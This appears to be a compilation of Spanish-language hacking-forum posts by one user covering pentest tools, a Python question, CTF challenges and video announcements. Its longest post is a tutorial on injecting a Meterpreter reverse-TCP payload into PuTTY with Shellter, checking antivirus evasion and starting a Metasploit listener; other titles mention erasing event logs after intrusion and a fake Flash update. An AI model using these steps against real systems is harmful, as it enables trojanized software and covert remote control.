Hi Underc0ders .
En este vídeo ,  hago el análisis básico de un malware [Android] .
Espero que os guste el contenido del vídeo .
Saludos .

Hola underc0ders:

Hoy vengo a presentaros LionSec Linux 5.0 , una distro basada en Ubuntu , diseñada para la auditoria y seguridad informática .
Trae una multitud de herramientas incorporadas como armitage , metasploit, netool, websploit, burpsuite, herramientas de análisis web, herramientas de ingeniería social y otras herramientas de Pentesting.
Gracias al  "Modo Anónimo", es posible navegar por Internet o enviar paquetes de forma anónima.

Teaser




Vista previa












Info
Tamaño : 2.6GB
Escritorio : Gnome Shell (Consumo medio de memoria : 120 mb)
Ubuntu 15.10

Os invito a probarlo, y espero que os gustará .

Página official : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Un saludo a toda la comunidad y feliz año nuevo.

LionSec

Hola amigos , os invito a todos a probar mi nueva herramienta.
Katoolin: Un script que permite instalar todas las herramientas de Kali Linux automáticamente .
Me surgió esta idea porque estaba buscando algo asi y no lo encontraba, entonces decidí hacerlo yo.
También invito a los bloggers y youtubers a dedicarle un artículo o un vídeo ,me ayudariá a mi y a mucha gente. Espero que os guste, no duden en compartirlo.


Instalación:

sudo su
git clone https://github.com/LionSec/katoolin.git && cp katoolin/katoolin.py /usr/bin/katoolin
chmod +x /usr/bin/katoolin
sudo katoolin

Si tenéis problemas durante la instalación, prueven descargando directamente el archivo: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vídeo: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos

Hola a todos. Hace mucho tiempo que estoy buscando como ver cuantas veces se descargó mi proyecto, y no hay manera. No se si alguien sabe cómo verlo o si es imposible.
(Solo puedo ver cuantas veces ha sido clonado vía "git clone ")

Espero que alguien pueda ayudarme

Saludos.

Un saludo underc0ders . 

No se si alguien podrá ayudarme . Me gustaría saber cómo leer todo el contenido de una linea , basándome en una palabra .

Ejemplo :
Imaginaros que mi archivo contiene lo siguiente :

artículos o mirar vídeos relacionados con el hacking 
la seguridad informática , la programación , domótica etc 
 y lo que aprendo lo comparto con vídeos que subo en Youtube

Me gustaría indicar a Python que lea todas las lineas que contienen la palabra "vídeos".
con lo cual me tendría que mostrar toda la linea 1 y 3 .

No sé si alguien sabe cómo puedo hacerlo, llevo mucho tiempo intentando varias cosas pero no me funcionan .

Gracias.

Shellter es una herramienta dinámica de inyección de shellcode . Puede ser ustilizado para inyectar código shell en las aplicaciones nativas de Windows (Sólo 32 bits por el momento).
Puedes inyectar tu propio código o uno generado con un Framework, como Metasploit por ejemplo.
Shellter aprovecha la estructura original del archivo PE y no aplica ninguna modificación .

Para más información visita : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.

Instalación

Lo primero que haremos es descargarlo desde su página oficial (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta) . Es compatible con Windows , Linux y Mac (Usando wine) .
Instalación en kali linux (Si aún no tienes instalado Wine)

apt-get update
apt-get install shellter

Instalación en backbox

Primero hay que agregar los repositorios :

nano /etc/apt/sources.list

Añadimos las siguientes entradas :

deb http://ppa.launchpad.net/backbox/four/ubuntu trusty main
deb-src http://ppa.launchpad.net/backbox/four/ubuntu trusty main

apt-get update
apt-get install shellter

Instalación en Arch Linux :

yaourt -Syy
yaourt -S aur/shellter

En mi caso , estoy usando LionSec Linux (Basado en backbox) .

Una vez instalado , la siguente fase sería la ejecución .

Para ejecutarlo tecleamos "shellter" en la terminal , o "wine shellter.exe" para los que ya tenien instalado Wine .
Una vez ejecutado , elegimos la opción "Automatique"  (A) .



Después indicamos la ruta del archivo al que queremos inyectar el shellcode . Yo utilisaré putty .



Ahora tenemos que indicar si queremos configurar un payload o elgir uno de la lista que nos propone Shellter. Podemos elegir la opción "L" (Listed) si queremos utilizar uno que ya aparece en la lista , "C" (Configure) para configurarlo manualmente .

Vamos a teclear (L)



Después seleccionamos el payload que vamos a utilizar . Yo elegiré el primero (Meterpreter_Reverse_TCP) .

A continuación indicamos nuestra dirección IP y el puerto de escucha .



Y ya habremos terminado con Shellter .

Bueno ahora vamos a escanear nuestro archivo , en NoDistribute por ejemplo(Recomendado) .
Resultado






OK , sólo nos queda configurar el "listener" .

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost x.x.x.x
set lport xxx
exploit

En mi máquina de prueba , dotada de 1 un antivirus , voy a ejecutar mi archivo (putty) . Y como me lo esperaba , no salta ninguna alerta y se ejecuta sin problema .



Demo


Bueno amigos , eso ha sido todo . Espero que le sirva a más de uno .

Fuente : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Saludos

El estudio de 443 proxy gratuitos realizado por el investigador de seguridad Christian Haschek mostró que la mayoría de los proxy web gratuitos no son seguros.Modifican el Código javascript y html de los sitioso visitados por el cliente (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta), y muchos de ellos no aceptan la navegación bajo HTTPS.

Para comprobar la seguridad de los servidores proxy, el investigador desarrolló un script llamado Proxy Checker .

Proxy Checker es un script que permite comprobar :

- Si el proxy está en línea

- Si el uso de conexiones seguras HTTPS está permitido

- Si tu dirección IP será anónima

- Si el proxy modifica(o inyecta) el javascript de los sitios visitados

- Si el proxy modifica(o inyecta) el html de los sitios visitados

Es una buena opción si quieres comprobar la seguridad de los sevidores proxy que tienes previsto utilizar.

Para ello, basta con acceder a "No tienes permitido ver los links. Registrarse o Entrar a mi cuenta" , escribir la dirección del proxy +  puerto y Analizar.




Pero aun asi , sniffeando el tráfico o lanzando ataques MITM, se puede obtener datos o infectar quién se conecte al proxy


Saludos underc0ders

LionSec

Hola , acabo de montar un nuevo reto , y espero que os guste .

Target : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Objetivo : En la página se esconde un documento "Top Secret de la NSA". Accede a él y mandame un captura de pantalla del dicho documento por email ([email protected]) o mensaje privado .Está denegado el acceso directo ; sólo se puede acceder a la página desde No tienes permitido ver los links. Registrarse o Entrar a mi cuenta . Suerte

LionSec

El nombre de los ganadores será publicado en la página que aparece a continuación : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Exploit: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Para más información visiten : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos .

LionSec

LionSec

NB : La máquina que utilizo como "victima" en el vídeo es propriedad mía .
Es pero que les guste el vídeo .
Saludos

CVE-2015-1701 : Windows 7 privilege escalation vulnerability


Saludos

LionSec

Obtener contraseña (admin) de windows con metasploit usando el módulo phish_windows_credentials



Un saludo

LionSec

Hola a todos , en este vídeo hago una breve descripción de lo que es un IMSI Catcher . Espero que les guste .



Un saludo a todos

Un saludo a la comunidad de Underc0de.
Soy LionSec , hoy les traigo unos retos que he montado y que  iré ampliando .Espero que os divertais con ellos.

RETOS : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Resultados por MP o por email.

Saludos.

Espero que les sirva el vídeo , no olviden dejar comentarios . saludos

LionSec

Saludos .

LionSec

Elevación de privilegios en Windows 8/7 - Ring0



Que disfruten

LionSec

Que disfruten ; Saludos  @ LionSec @

Eliminar rastro y huellas después de una intrusión (Event Log)



Saludos

LionSec

Saludos ..

En este video hago una demo de lo possible que es  tomar el control de una máquina ; con una falsa actualización de flash  ; en el que la "victima" instalará un complemento malicioso de firefox que hemos previamente generado con cobalt strike ...



Que disfruten

Saludos

Que disfruten
----LionSec----

Más info ---> No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos
{LionSec}